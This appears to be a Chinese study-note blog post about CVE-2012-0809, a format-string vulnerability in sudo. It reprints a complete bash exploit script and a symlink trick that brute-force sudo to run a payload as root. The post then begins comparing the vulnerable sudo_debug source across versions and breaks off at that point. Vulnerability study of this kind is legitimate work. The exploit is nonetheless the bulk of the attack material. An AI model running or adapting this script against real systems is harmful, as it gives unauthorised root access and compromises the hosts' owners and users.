CVE-2012-0809-Sudo格式化字符串漏洞

简介

来源：漏洞战争

sudo有漏洞是个很爽的事情，😄，这个是可以提权的~

可通过ln等命令利用

ln -s /usr/bin/sudo ./%s
./%n -D9

在网上找到了如下exp

#!/bin/bash
# CVE-2012-0809 exploit 
# joernchen of Phenoelit's version 
# Payload to be executed goes to /tmp/a (might be a shell script)

cd /tmp
/bin/echo '-> Clearing ENV'
for i in `env |cut -f1 -d "="` ;do unset $i;done  
/bin/echo '-> Creating symlink'
/bin/ln -s /usr/bin/sudo ./%134520134x%900\$n
/bin/echo '-> Setting ENV'
export AAA=AAAA;
export A;
for i in `/usr/bin/seq 1 5000`; do 
export A=$A`echo -n -e '\x24\x83\x05\x08'`;
done;

/bin/echo '-> Now a little Brute-Force'
while true ; do SUDO_ASKPASS=/tmp/a ./%134520134x%900\$n -D9 -A id 2>/dev/null ; if [[ "$?" == "1" ]]; then break ;fi  ; done
/bin/echo '-> Cleaning up'
/bin/rm /tmp/%134520134x%900\$n

当然还有exploit-db的

https://www.exploit-db.com/exploits/25134/

源码对比分析

因为linux是开源的，这个软件也开源

看看出问题的sudo_debug函数在哪

$ grep "sudo_debug(int level" -r ./
./advisory_sudo.txt:sudo_debug(int level, const char *fmt, ...)
./sudo-1.8.3p1/src/sudo.c:sudo_debug(int level, const char *fmt, ...)
./sudo-1.8.3p1/src/sudo.h:void sudo_debug(int level, const char *format, ...) __printflike(2, 3);
./sudo-1.8.3p2/src/sudo.c:sudo_debug(int level, const char *fmt, ...)
./sudo-1.8.3p2/src/sudo.h:void sudo_debug(int level, const char *format, ...) __printflike(2, 3);

对比